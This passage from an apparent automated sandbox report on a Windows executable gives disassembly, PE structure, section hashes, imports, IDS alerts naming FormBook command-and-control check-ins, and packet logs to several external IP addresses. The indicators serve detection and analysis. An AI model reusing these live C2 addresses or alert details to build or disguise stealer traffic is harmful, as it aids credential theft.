                  mov edi, dword ptr [esp+0Ch]
                  mov eax, ecx
                  mov edx, ecx
                  add eax, esi
                  cmp edi, esi
                  jbe 00007FEFE91BC3BAh
                  cmp edi, eax
                  jc 00007FEFE91BC71Eh
                  bt dword ptr [004C31FCh], 01h
                  jnc 00007FEFE91BC3B9h
                  rep movsb
                  jmp 00007FEFE91BC6CCh
                  cmp ecx, 00000080h
                  jc 00007FEFE91BC584h
                  mov eax, edi
                  xor eax, esi
                  test eax, 0000000Fh
                  jne 00007FEFE91BC3C0h
                  bt dword ptr [004BE324h], 01h
                  jc 00007FEFE91BC890h
                  bt dword ptr [004C31FCh], 00000000h
                  jnc 00007FEFE91BC55Dh
                  test edi, 00000003h
                  jne 00007FEFE91BC56Eh
                  test esi, 00000003h
                  jne 00007FEFE91BC54Dh
                  bt edi, 02h
                  jnc 00007FEFE91BC3BFh
                  mov eax, dword ptr [esi]
                  sub ecx, 04h
                  lea esi, dword ptr [esi+04h]
                  mov dword ptr [edi], eax
                  lea edi, dword ptr [edi+04h]
                  bt edi, 03h
                  jnc 00007FEFE91BC3C3h
                  movq xmm1, qword ptr [esi]
                  sub ecx, 08h
                  lea esi, dword ptr [esi+08h]
                  movq qword ptr [edi], xmm1
                  lea edi, dword ptr [edi+08h]
                  test esi, 00000007h
                  je 00007FEFE91BC415h
                  bt esi, 03h
                  Programming Language:
                  • [ASM] VS2013 build 21005
                  • [ C ] VS2013 build 21005
                  • [C++] VS2013 build 21005
                  • [ C ] VS2008 SP1 build 30729
                  • [IMP] VS2008 SP1 build 30729
                  • [ASM] VS2013 UPD5 build 40629
                  • [RES] VS2013 build 21005
                  • [LNK] VS2013 UPD5 build 40629
                   Name | Virtual Address | Virtual Size | Is in Section
                   IMAGE_DIRECTORY_ENTRY_EXPORT | 0x0 | 0x0 |
                   IMAGE_DIRECTORY_ENTRY_IMPORT | 0xba44c | 0x17c | .rdata
                   IMAGE_DIRECTORY_ENTRY_RESOURCE | 0xc7000 | 0x700d4 | .rsrc
                   IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0 |
                   IMAGE_DIRECTORY_ENTRY_SECURITY | 0x0 | 0x0 |
                   IMAGE_DIRECTORY_ENTRY_BASERELOC | 0x138000 | 0x7130 | .reloc
                   IMAGE_DIRECTORY_ENTRY_DEBUG | 0x92bc0 | 0x1c | .rdata
                   IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 |
                   IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 |
                   IMAGE_DIRECTORY_ENTRY_TLS | 0x0 | 0x0 |
                   IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0xa4870 | 0x40 | .rdata
                   IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 |
                   IMAGE_DIRECTORY_ENTRY_IAT | 0x8f000 | 0x884 | .rdata
                   IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x0 | 0x0 |
                   IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x0 | 0x0 |
                   IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 |
                   Name | Virtual Address | Virtual Size | Raw Size | MD5 | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics
                   .text | 0x1000 | 0x8dd2e | 0x8de00 | c2c2260508750422d20cd5cbb116b146 | False | 0.5729952505506608 | data | 6.675875439961112 | IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                   .rdata | 0x8f000 | 0x2e10e | 0x2e200 | 4513b58651e3d8d87c81a396e5b2f1d1 | False | 0.3353340955284553 | OpenPGP Public Key | 5.760731648769018 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                   .data | 0xbe000 | 0x8f74 | 0x5200 | c2de4a3d214eae7e87c7bfc06bd79775 | False | 0.1017530487804878 | data | 1.1988106744719143 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                   .rsrc | 0xc7000 | 0x700d4 | 0x70200 | e42f17cc5c9fefad7202dd641b373321 | False | 0.9411253658026756 | data | 7.922366333206114 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                   .reloc | 0x138000 | 0x7130 | 0x7200 | 1254908a9a03d2bcf12045d49cd572b9 | False | 0.7703536184210527 | data | 6.782377328042204 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
                   Name | RVA | Size | Type | Language | Country | ZLIB Complexity
                   RT_ICON | 0xc75a8 | 0x128 | Device independent bitmap graphic, 16 x 32 x 4, image size 192 | English | Great Britain | 0.7466216216216216
                   RT_ICON | 0xc76d0 | 0x128 | Device independent bitmap graphic, 16 x 32 x 4, image size 128, 16 important colors | English | Great Britain | 0.3277027027027027
                   RT_ICON | 0xc77f8 | 0x128 | Device independent bitmap graphic, 16 x 32 x 4, image size 192 | English | Great Britain | 0.3885135135135135
                   RT_ICON | 0xc7920 | 0x2e8 | Device independent bitmap graphic, 32 x 64 x 4, image size 0 | English | Great Britain | 0.3333333333333333
                   RT_ICON | 0xc7c08 | 0x128 | Device independent bitmap graphic, 16 x 32 x 4, image size 0 | English | Great Britain | 0.5
                   RT_ICON | 0xc7d30 | 0xea8 | Device independent bitmap graphic, 48 x 96 x 8, image size 0 | English | Great Britain | 0.2835820895522388
                   RT_ICON | 0xc8bd8 | 0x8a8 | Device independent bitmap graphic, 32 x 64 x 8, image size 0 | English | Great Britain | 0.37906137184115524
                   RT_ICON | 0xc9480 | 0x568 | Device independent bitmap graphic, 16 x 32 x 8, image size 0 | English | Great Britain | 0.23699421965317918
                   RT_ICON | 0xc99e8 | 0x25a8 | Device independent bitmap graphic, 48 x 96 x 32, image size 0 | English | Great Britain | 0.13858921161825727
                   RT_ICON | 0xcbf90 | 0x10a8 | Device independent bitmap graphic, 32 x 64 x 32, image size 0 | English | Great Britain | 0.25070356472795496
                   RT_ICON | 0xcd038 | 0x468 | Device independent bitmap graphic, 16 x 32 x 32, image size 0 | English | Great Britain | 0.3173758865248227
                   RT_MENU | 0xcd4a0 | 0x50 | data | English | Great Britain | 0.9
                   RT_STRING | 0xcd4f0 | 0x594 | data | English | Great Britain | 0.3333333333333333
                   RT_STRING | 0xcda84 | 0x68a | data | English | Great Britain | 0.2747909199522103
                   RT_STRING | 0xce110 | 0x490 | data | English | Great Britain | 0.3715753424657534
                   RT_STRING | 0xce5a0 | 0x5fc | data | English | Great Britain | 0.3087467362924282
                   RT_STRING | 0xceb9c | 0x65c | data | English | Great Britain | 0.34336609336609336
                   RT_STRING | 0xcf1f8 | 0x466 | data | English | Great Britain | 0.3605683836589698
                   RT_STRING | 0xcf660 | 0x158 | Matlab v4 mat-file (little endian) n, numeric, rows 0, columns 0 | English | Great Britain | 0.502906976744186
                   RT_RCDATA | 0xcf7b8 | 0x67339 | data | | | 1.000321731292863
                   RT_GROUP_ICON | 0x136af4 | 0x76 | data | English | Great Britain | 0.6610169491525424
                   RT_GROUP_ICON | 0x136b6c | 0x14 | data | English | Great Britain | 1.25
                   RT_GROUP_ICON | 0x136b80 | 0x14 | data | English | Great Britain | 1.15
                   RT_GROUP_ICON | 0x136b94 | 0x14 | data | English | Great Britain | 1.25
                   RT_VERSION | 0x136ba8 | 0x13c | data | English | Great Britain | 0.5791139240506329
                   RT_MANIFEST | 0x136ce4 | 0x3ef | ASCII text, with CRLF line terminators | English | Great Britain | 0.5074478649453823
                   DLL | Import
                   WSOCK32.dll | WSACleanup, socket, inet_ntoa, setsockopt, ntohs, recvfrom, ioctlsocket, htons, WSAStartup, __WSAFDIsSet, select, accept, listen, bind, closesocket, WSAGetLastError, recv, sendto, send, inet_addr, gethostbyname, gethostname, connect
                   VERSION.dll | GetFileVersionInfoW, GetFileVersionInfoSizeW, VerQueryValueW
                   WINMM.dll | timeGetTime, waveOutSetVolume, mciSendStringW
                   COMCTL32.dll | ImageList_ReplaceIcon, ImageList_Destroy, ImageList_Remove, ImageList_SetDragCursorImage, ImageList_BeginDrag, ImageList_DragEnter, ImageList_DragLeave, ImageList_EndDrag, ImageList_DragMove, InitCommonControlsEx, ImageList_Create
                   MPR.dll | WNetUseConnectionW, WNetCancelConnection2W, WNetGetConnectionW, WNetAddConnection2W
                   WININET.dll | InternetQueryDataAvailable, InternetCloseHandle, InternetOpenW, InternetSetOptionW, InternetCrackUrlW, HttpQueryInfoW, InternetQueryOptionW, HttpOpenRequestW, HttpSendRequestW, FtpOpenFileW, FtpGetFileSize, InternetOpenUrlW, InternetReadFile, InternetConnectW
                   PSAPI.DLL | GetProcessMemoryInfo
                   IPHLPAPI.DLL | IcmpCreateFile, IcmpCloseHandle, IcmpSendEcho
                   USERENV.dll | DestroyEnvironmentBlock, UnloadUserProfile, CreateEnvironmentBlock, LoadUserProfileW
                   UxTheme.dll | IsThemeActive
                   KERNEL32.dll | DuplicateHandle, CreateThread, WaitForSingleObject, HeapAlloc, GetProcessHeap, HeapFree, Sleep, GetCurrentThreadId, MultiByteToWideChar, MulDiv, GetVersionExW, IsWow64Process, GetSystemInfo, FreeLibrary, LoadLibraryA, GetProcAddress, SetErrorMode, GetModuleFileNameW, WideCharToMultiByte, lstrcpyW, lstrlenW, GetModuleHandleW, QueryPerformanceCounter, VirtualFreeEx, OpenProcess, VirtualAllocEx, WriteProcessMemory, ReadProcessMemory, CreateFileW, SetFilePointerEx, SetEndOfFile, ReadFile, WriteFile, FlushFileBuffers, TerminateProcess, CreateToolhelp32Snapshot, Process32FirstW, Process32NextW, SetFileTime, GetFileAttributesW, FindFirstFileW, SetCurrentDirectoryW, GetLongPathNameW, GetShortPathNameW, DeleteFileW, FindNextFileW, CopyFileExW, MoveFileW, CreateDirectoryW, RemoveDirectoryW, SetSystemPowerState, QueryPerformanceFrequency, FindResourceW, LoadResource, LockResource, SizeofResource, EnumResourceNamesW, OutputDebugStringW, GetTempPathW, GetTempFileNameW, DeviceIoControl, GetLocalTime, CompareStringW, GetCurrentProcess, EnterCriticalSection, LeaveCriticalSection, GetStdHandle, CreatePipe, InterlockedExchange, TerminateThread, LoadLibraryExW, FindResourceExW, CopyFileW, VirtualFree, FormatMessageW, GetExitCodeProcess, GetPrivateProfileStringW, WritePrivateProfileStringW, GetPrivateProfileSectionW, WritePrivateProfileSectionW, GetPrivateProfileSectionNamesW, FileTimeToLocalFileTime, FileTimeToSystemTime, SystemTimeToFileTime, LocalFileTimeToFileTime, GetDriveTypeW, GetDiskFreeSpaceExW, GetDiskFreeSpaceW, GetVolumeInformationW, SetVolumeLabelW, CreateHardLinkW, SetFileAttributesW, CreateEventW, SetEvent, GetEnvironmentVariableW, SetEnvironmentVariableW, GlobalLock, GlobalUnlock, GlobalAlloc, GetFileSize, GlobalFree, GlobalMemoryStatusEx, Beep, GetSystemDirectoryW, HeapReAlloc, HeapSize, GetComputerNameW, GetWindowsDirectoryW, GetCurrentProcessId, GetProcessIoCounters, CreateProcessW, GetProcessId, SetPriorityClass, LoadLibraryW, VirtualAlloc, IsDebuggerPresent, GetCurrentDirectoryW, lstrcmpiW, DecodePointer, GetLastError, RaiseException, InitializeCriticalSectionAndSpinCount, DeleteCriticalSection, InterlockedDecrement, InterlockedIncrement, GetCurrentThread, CloseHandle, GetFullPathNameW, EncodePointer, ExitProcess, GetModuleHandleExW, ExitThread, GetSystemTimeAsFileTime, ResumeThread, GetCommandLineW, IsProcessorFeaturePresent, IsValidCodePage, GetACP, GetOEMCP, GetCPInfo, SetLastError, UnhandledExceptionFilter, SetUnhandledExceptionFilter, TlsAlloc, TlsGetValue, TlsSetValue, TlsFree, GetStartupInfoW, GetStringTypeW, SetStdHandle, GetFileType, GetConsoleCP, GetConsoleMode, RtlUnwind, ReadConsoleW, GetTimeZoneInformation, GetDateFormatW, GetTimeFormatW, LCMapStringW, GetEnvironmentStringsW, FreeEnvironmentStringsW, WriteConsoleW, FindClose, SetEnvironmentVariableA
                   USER32.dll | AdjustWindowRectEx, CopyImage, SetWindowPos, GetCursorInfo, RegisterHotKey, ClientToScreen, GetKeyboardLayoutNameW, IsCharAlphaW, IsCharAlphaNumericW, IsCharLowerW, IsCharUpperW, GetMenuStringW, GetSubMenu, GetCaretPos, IsZoomed, MonitorFromPoint, GetMonitorInfoW, SetWindowLongW, SetLayeredWindowAttributes, FlashWindow, GetClassLongW, TranslateAcceleratorW, IsDialogMessageW, GetSysColor, InflateRect, DrawFocusRect, DrawTextW, FrameRect, DrawFrameControl, FillRect, PtInRect, DestroyAcceleratorTable, CreateAcceleratorTableW, SetCursor, GetWindowDC, GetSystemMetrics, GetActiveWindow, CharNextW, wsprintfW, RedrawWindow, DrawMenuBar, DestroyMenu, SetMenu, GetWindowTextLengthW, CreateMenu, IsDlgButtonChecked, DefDlgProcW, CallWindowProcW, ReleaseCapture, SetCapture, CreateIconFromResourceEx, mouse_event, ExitWindowsEx, SetActiveWindow, FindWindowExW, EnumThreadWindows, SetMenuDefaultItem, InsertMenuItemW, IsMenu, TrackPopupMenuEx, GetCursorPos, DeleteMenu, SetRect, GetMenuItemID, GetMenuItemCount, SetMenuItemInfoW, GetMenuItemInfoW, SetForegroundWindow, IsIconic, FindWindowW, MonitorFromRect, keybd_event, SendInput, GetAsyncKeyState, SetKeyboardState, GetKeyboardState, GetKeyState, VkKeyScanW, LoadStringW, DialogBoxParamW, MessageBeep, EndDialog, SendDlgItemMessageW, GetDlgItem, SetWindowTextW, CopyRect, ReleaseDC, GetDC, EndPaint, BeginPaint, GetClientRect, GetMenu, DestroyWindow, EnumWindows, GetDesktopWindow, IsWindow, IsWindowEnabled, IsWindowVisible, EnableWindow, InvalidateRect, GetWindowLongW, GetWindowThreadProcessId, AttachThreadInput, GetFocus, GetWindowTextW, ScreenToClient, SendMessageTimeoutW, EnumChildWindows, CharUpperBuffW, GetParent, GetDlgCtrlID, SendMessageW, MapVirtualKeyW, PostMessageW, GetWindowRect, SetUserObjectSecurity, CloseDesktop, CloseWindowStation, OpenDesktopW, SetProcessWindowStation, GetProcessWindowStation, OpenWindowStationW, GetUserObjectSecurity, MessageBoxW, DefWindowProcW, SetClipboardData, EmptyClipboard, CountClipboardFormats, CloseClipboard, GetClipboardData, IsClipboardFormatAvailable, OpenClipboard, BlockInput, GetMessageW, LockWindowUpdate, DispatchMessageW, TranslateMessage, PeekMessageW, UnregisterHotKey, CheckMenuRadioItem, CharLowerBuffW, MoveWindow, SetFocus, PostQuitMessage, KillTimer, CreatePopupMenu, RegisterWindowMessageW, SetTimer, ShowWindow, CreateWindowExW, RegisterClassExW, LoadIconW, LoadCursorW, GetSysColorBrush, GetForegroundWindow, MessageBoxA, DestroyIcon, SystemParametersInfoW, LoadImageW, GetClassNameW
                   GDI32.dll | StrokePath, DeleteObject, GetTextExtentPoint32W, ExtCreatePen, GetDeviceCaps, EndPath, SetPixel, CloseFigure, CreateCompatibleBitmap, CreateCompatibleDC, SelectObject, StretchBlt, GetDIBits, LineTo, AngleArc, MoveToEx, Ellipse, DeleteDC, GetPixel, CreateDCW, GetStockObject, GetTextFaceW, CreateFontW, SetTextColor, PolyDraw, BeginPath, Rectangle, SetViewportOrgEx, GetObjectW, SetBkMode, RoundRect, SetBkColor, CreatePen, CreateSolidBrush, StrokeAndFillPath
                   COMDLG32.dll | GetOpenFileNameW, GetSaveFileNameW
                   ADVAPI32.dll | GetAce, RegEnumValueW, RegDeleteValueW, RegDeleteKeyW, RegEnumKeyExW, RegSetValueExW, RegOpenKeyExW, RegCloseKey, RegQueryValueExW, RegConnectRegistryW, InitializeSecurityDescriptor, InitializeAcl, AdjustTokenPrivileges, OpenThreadToken, OpenProcessToken, LookupPrivilegeValueW, DuplicateTokenEx, CreateProcessAsUserW, CreateProcessWithLogonW, GetLengthSid, CopySid, LogonUserW, AllocateAndInitializeSid, CheckTokenMembership, RegCreateKeyExW, FreeSid, GetTokenInformation, GetSecurityDescriptorDacl, GetAclInformation, AddAce, SetSecurityDescriptorDacl, GetUserNameW, InitiateSystemShutdownExW
                   SHELL32.dll | DragQueryPoint, ShellExecuteExW, DragQueryFileW, SHEmptyRecycleBinW, SHGetPathFromIDListW, SHBrowseForFolderW, SHCreateShellItem, SHGetDesktopFolder, SHGetSpecialFolderLocation, SHGetFolderPathW, SHFileOperationW, ExtractIconExW, Shell_NotifyIconW, ShellExecuteW, DragFinish
                   ole32.dll | CoTaskMemAlloc, CoTaskMemFree, CLSIDFromString, ProgIDFromCLSID, CLSIDFromProgID, OleSetMenuDescriptor, MkParseDisplayName, OleSetContainedObject, CoCreateInstance, IIDFromString, StringFromGUID2, CreateStreamOnHGlobal, OleInitialize, OleUninitialize, CoInitialize, CoUninitialize, GetRunningObjectTable, CoGetInstanceFromFile, CoGetObject, CoSetProxyBlanket, CoCreateInstanceEx, CoInitializeSecurity
                   OLEAUT32.dll | LoadTypeLibEx, VariantCopyInd, SysReAllocString, SysFreeString, SafeArrayDestroyDescriptor, SafeArrayDestroyData, SafeArrayUnaccessData, SafeArrayAccessData, SafeArrayAllocData, SafeArrayAllocDescriptorEx, SafeArrayCreateVector, RegisterTypeLib, CreateStdDispatch, DispCallFunc, VariantChangeType, SysStringLen, VariantTimeToSystemTime, VarR8FromDec, SafeArrayGetVartype, VariantCopy, VariantClear, OleLoadPicture, QueryPathOfRegTypeLib, RegisterTypeLibForUser, UnRegisterTypeLibForUser, UnRegisterTypeLib, CreateDispTypeInfo, SysAllocString, VariantInit
                   Language of compilation system | Country where language is spoken
                   English | Great Britain
                   Timestamp | SID | Signature | Severity | Source IP | Source Port | Dest IP | Dest Port | Protocol
                   2024-09-14T11:11:12.968205+0200 | 2855465 | ETPRO MALWARE FormBook CnC Checkin (GET) M2 | 1 | 192.168.2.4 | 49737 | 3.33.130.190 | 80 | TCP
                   2024-09-14T11:11:29.516502+0200 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.4 | 49738 | 18.139.62.226 | 80 | TCP
                   2024-09-14T11:11:32.059029+0200 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.4 | 49739 | 18.139.62.226 | 80 | TCP
                   2024-09-14T11:11:34.612983+0200 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.4 | 49740 | 18.139.62.226 | 80 | TCP
                   2024-09-14T11:11:37.124367+0200 | 2855465 | ETPRO MALWARE FormBook CnC Checkin (GET) M2 | 1 | 192.168.2.4 | 49741 | 18.139.62.226 | 80 | TCP
                   2024-09-14T11:11:42.992237+0200 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.4 | 49742 | 66.81.203.10 | 80 | TCP
                   2024-09-14T11:11:45.518035+0200 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.4 | 49743 | 66.81.203.10 | 80 | TCP
                   2024-09-14T11:11:48.128716+0200 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.4 | 49744 | 66.81.203.10 | 80 | TCP
                   2024-09-14T11:11:50.612929+0200 | 2855465 | ETPRO MALWARE FormBook CnC Checkin (GET) M2 | 1 | 192.168.2.4 | 49745 | 66.81.203.10 | 80 | TCP
                   2024-09-14T11:11:57.285087+0200 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.4 | 49746 | 103.42.108.46 | 80 | TCP
                   2024-09-14T11:11:59.884516+0200 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.4 | 49747 | 103.42.108.46 | 80 | TCP
                   2024-09-14T11:12:02.431525+0200 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.4 | 49748 | 103.42.108.46 | 80 | TCP
                   2024-09-14T11:12:04.990794+0200 | 2855465 | ETPRO MALWARE FormBook CnC Checkin (GET) M2 | 1 | 192.168.2.4 | 49749 | 103.42.108.46 | 80 | TCP
                   2024-09-14T11:12:11.113126+0200 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.4 | 49750 | 3.33.130.190 | 80 | TCP
                   2024-09-14T11:12:14.599655+0200 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.4 | 49751 | 3.33.130.190 | 80 | TCP
                   2024-09-14T11:12:16.217823+0200 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.4 | 49752 | 3.33.130.190 | 80 | TCP
                   2024-09-14T11:12:18.771437+0200 | 2855465 | ETPRO MALWARE FormBook CnC Checkin (GET) M2 | 1 | 192.168.2.4 | 49753 | 3.33.130.190 | 80 | TCP
                   2024-09-14T11:12:32.486159+0200 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.4 | 49754 | 199.59.243.226 | 80 | TCP
                   2024-09-14T11:12:35.042182+0200 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.4 | 49755 | 199.59.243.226 | 80 | TCP
                   2024-09-14T11:12:37.822272+0200 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.4 | 49756 | 199.59.243.226 | 80 | TCP
                   2024-09-14T11:12:40.145807+0200 | 2855465 | ETPRO MALWARE FormBook CnC Checkin (GET) M2 | 1 | 192.168.2.4 | 49757 | 199.59.243.226 | 80 | TCP
                   2024-09-14T11:12:45.819857+0200 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.4 | 49758 | 162.0.239.141 | 80 | TCP
                   2024-09-14T11:12:48.348923+0200 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.4 | 49759 | 162.0.239.141 | 80 | TCP
                   2024-09-14T11:12:50.939526+0200 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.4 | 49760 | 162.0.239.141 | 80 | TCP
                   2024-09-14T11:12:53.457606+0200 | 2855465 | ETPRO MALWARE FormBook CnC Checkin (GET) M2 | 1 | 192.168.2.4 | 49761 | 162.0.239.141 | 80 | TCP
                   2024-09-14T11:13:07.153462+0200 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.4 | 49762 | 84.32.84.32 | 80 | TCP
                   2024-09-14T11:13:09.671094+0200 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.4 | 49763 | 84.32.84.32 | 80 | TCP
                   2024-09-14T11:13:12.239819+0200 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.4 | 49764 | 84.32.84.32 | 80 | TCP
                   2024-09-14T11:13:14.891931+0200 | 2855465 | ETPRO MALWARE FormBook CnC Checkin (GET) M2 | 1 | 192.168.2.4 | 49765 | 84.32.84.32 | 80 | TCP
                   Timestamp | Source Port | Dest Port | Source IP | Dest IP
                   Sep 14, 2024 11:11:11.583623886 CEST | 49737 | 80 | 192.168.2.4 | 3.33.130.190
                   Sep 14, 2024 11:11:11.588516951 CEST | 80 | 49737 | 3.33.130.190 | 192.168.2.4
                   Sep 14, 2024 11:11:11.588620901 CEST | 49737 | 80 | 192.168.2.4 | 3.33.130.190
                   Sep 14, 2024 11:11:11.594907045 CEST | 49737 | 80 | 192.168.2.4 | 3.33.130.190
                   Sep 14, 2024 11:11:11.599790096 CEST | 80 | 49737 | 3.33.130.190 | 192.168.2.4
                   Sep 14, 2024 11:11:12.967840910 CEST | 80 | 49737 | 3.33.130.190 | 192.168.2.4
                   Sep 14, 2024 11:11:12.967914104 CEST | 80 | 49737 | 3.33.130.190 | 192.168.2.4
                   Sep 14, 2024 11:11:12.968204975 CEST | 49737 | 80 | 192.168.2.4 | 3.33.130.190
                   Sep 14, 2024 11:11:12.971141100 CEST | 49737 | 80 | 192.168.2.4 | 3.33.130.190
                   Sep 14, 2024 11:11:12.976283073 CEST | 80 | 49737 | 3.33.130.190 | 192.168.2.4
                   Sep 14, 2024 11:11:28.577025890 CEST | 49738 | 80 | 192.168.2.4 | 18.139.62.226
                   Sep 14, 2024 11:11:28.581959009 CEST | 80 | 49738 | 18.139.62.226 | 192.168.2.4
                   Sep 14, 2024 11:11:28.582051039 CEST | 49738 | 80 | 192.168.2.4 | 18.139.62.226
                   Sep 14, 2024 11:11:28.590806961 CEST | 49738 | 80 | 192.168.2.4 | 18.139.62.226
                   Sep 14, 2024 11:11:28.595577955 CEST | 80 | 49738 | 18.139.62.226 | 192.168.2.4
                   Sep 14, 2024 11:11:29.516406059 CEST | 80 | 49738 | 18.139.62.226 | 192.168.2.4
                   Sep 14, 2024 11:11:29.516444921 CEST | 80 | 49738 | 18.139.62.226 | 192.168.2.4
                   Sep 14, 2024 11:11:29.516501904 CEST | 49738 | 80 | 192.168.2.4 | 18.139.62.226
                   Sep 14, 2024 11:11:30.097549915 CEST | 49738 | 80 | 192.168.2.4 | 18.139.62.226
                   Sep 14, 2024 11:11:31.115758896 CEST | 49739 | 80 | 192.168.2.4 | 18.139.62.226
                   Sep 14, 2024 11:11:31.120649099 CEST | 80 | 49739 | 18.139.62.226 | 192.168.2.4
                   Sep 14, 2024 11:11:31.120731115 CEST | 49739 | 80 | 192.168.2.4 | 18.139.62.226
                   Sep 14, 2024 11:11:31.131051064 CEST | 49739 | 80 | 192.168.2.4 | 18.139.62.226
                   Sep 14, 2024 11:11:31.137799025 CEST | 80 | 49739 | 18.139.62.226 | 192.168.2.4
                   Sep 14, 2024 11:11:32.058912039 CEST | 80 | 49739 | 18.139.62.226 | 192.168.2.4
                   Sep 14, 2024 11:11:32.058944941 CEST | 80 | 49739 | 18.139.62.226 | 192.168.2.4
                   Sep 14, 2024 11:11:32.059029102 CEST | 49739 | 80 | 192.168.2.4 | 18.139.62.226
                   Sep 14, 2024 11:11:32.644278049 CEST | 49739 | 80 | 192.168.2.4 | 18.139.62.226
                   Sep 14, 2024 11:11:33.662437916 CEST | 49740 | 80 | 192.168.2.4 | 18.139.62.226
                   Sep 14, 2024 11:11:33.667576075 CEST | 80 | 49740 | 18.139.62.226 | 192.168.2.4
                   Sep 14, 2024 11:11:33.667692900 CEST | 49740 | 80 | 192.168.2.4 | 18.139.62.226
                   Sep 14, 2024 11:11:33.677061081 CEST | 49740 | 80 | 192.168.2.4 | 18.139.62.226
                   Sep 14, 2024 11:11:33.682007074 CEST | 80 | 49740 | 18.139.62.226 | 192.168.2.4
                   Sep 14, 2024 11:11:33.682018995 CEST | 80 | 49740 | 18.139.62.226 | 192.168.2.4
                   Sep 14, 2024 11:11:33.682145119 CEST | 80 | 49740 | 18.139.62.226 | 192.168.2.4
                   Sep 14, 2024 11:11:33.682154894 CEST | 80 | 49740 | 18.139.62.226 | 192.168.2.4
                   Sep 14, 2024 11:11:33.682163000 CEST | 80 | 49740 | 18.139.62.226 | 192.168.2.4
                   Sep 14, 2024 11:11:33.682543993 CEST | 80 | 49740 | 18.139.62.226 | 192.168.2.4
                   Sep 14, 2024 11:11:33.682553053 CEST | 80 | 49740 | 18.139.62.226 | 192.168.2.4
                   Sep 14, 2024 11:11:33.682560921 CEST | 80 | 49740 | 18.139.62.226 | 192.168.2.4
                   Sep 14, 2024 11:11:33.682569027 CEST | 80 | 49740 | 18.139.62.226 | 192.168.2.4
                   Sep 14, 2024 11:11:34.569891930 CEST | 80 | 49740 | 18.139.62.226 | 192.168.2.4
                   Sep 14, 2024 11:11:34.612982988 CEST | 49740 | 80 | 192.168.2.4 | 18.139.62.226
                   Sep 14, 2024 11:11:34.799669027 CEST | 80 | 49740 | 18.139.62.226 | 192.168.2.4
                   Sep 14, 2024 11:11:34.799763918 CEST | 49740 | 80 | 192.168.2.4 | 18.139.62.226
                   Sep 14, 2024 11:11:35.191325903 CEST | 49740 | 80 | 192.168.2.4 | 18.139.62.226
                   Sep 14, 2024 11:11:36.209552050 CEST | 49741 | 80 | 192.168.2.4 | 18.139.62.226
                   Sep 14, 2024 11:11:36.214617968 CEST | 80 | 49741 | 18.139.62.226 | 192.168.2.4
                   Sep 14, 2024 11:11:36.214720964 CEST | 49741 | 80 | 192.168.2.4 | 18.139.62.226
                   Sep 14, 2024 11:11:36.221396923 CEST | 49741 | 80 | 192.168.2.4 | 18.139.62.226
                   Sep 14, 2024 11:11:36.226341963 CEST | 80 | 49741 | 18.139.62.226 | 192.168.2.4
                   Sep 14, 2024 11:11:37.124176979 CEST | 80 | 49741 | 18.139.62.226 | 192.168.2.4
                   Sep 14, 2024 11:11:37.124285936 CEST | 80 | 49741 | 18.139.62.226 | 192.168.2.4
                   Sep 14, 2024 11:11:37.124366999 CEST | 49741 | 80 | 192.168.2.4 | 18.139.62.226
                   Sep 14, 2024 11:11:37.126503944 CEST | 49741 | 80 | 192.168.2.4 | 18.139.62.226
                   Sep 14, 2024 11:11:37.131345987 CEST | 80 | 49741 | 18.139.62.226 | 192.168.2.4
                   Sep 14, 2024 11:11:42.387702942 CEST | 49742 | 80 | 192.168.2.4 | 66.81.203.10
                   Sep 14, 2024 11:11:42.395014048 CEST | 80 | 49742 | 66.81.203.10 | 192.168.2.4
                   Sep 14, 2024 11:11:42.395092964 CEST | 49742 | 80 | 192.168.2.4 | 66.81.203.10
                   Sep 14, 2024 11:11:42.404767036 CEST | 49742 | 80 | 192.168.2.4 | 66.81.203.10
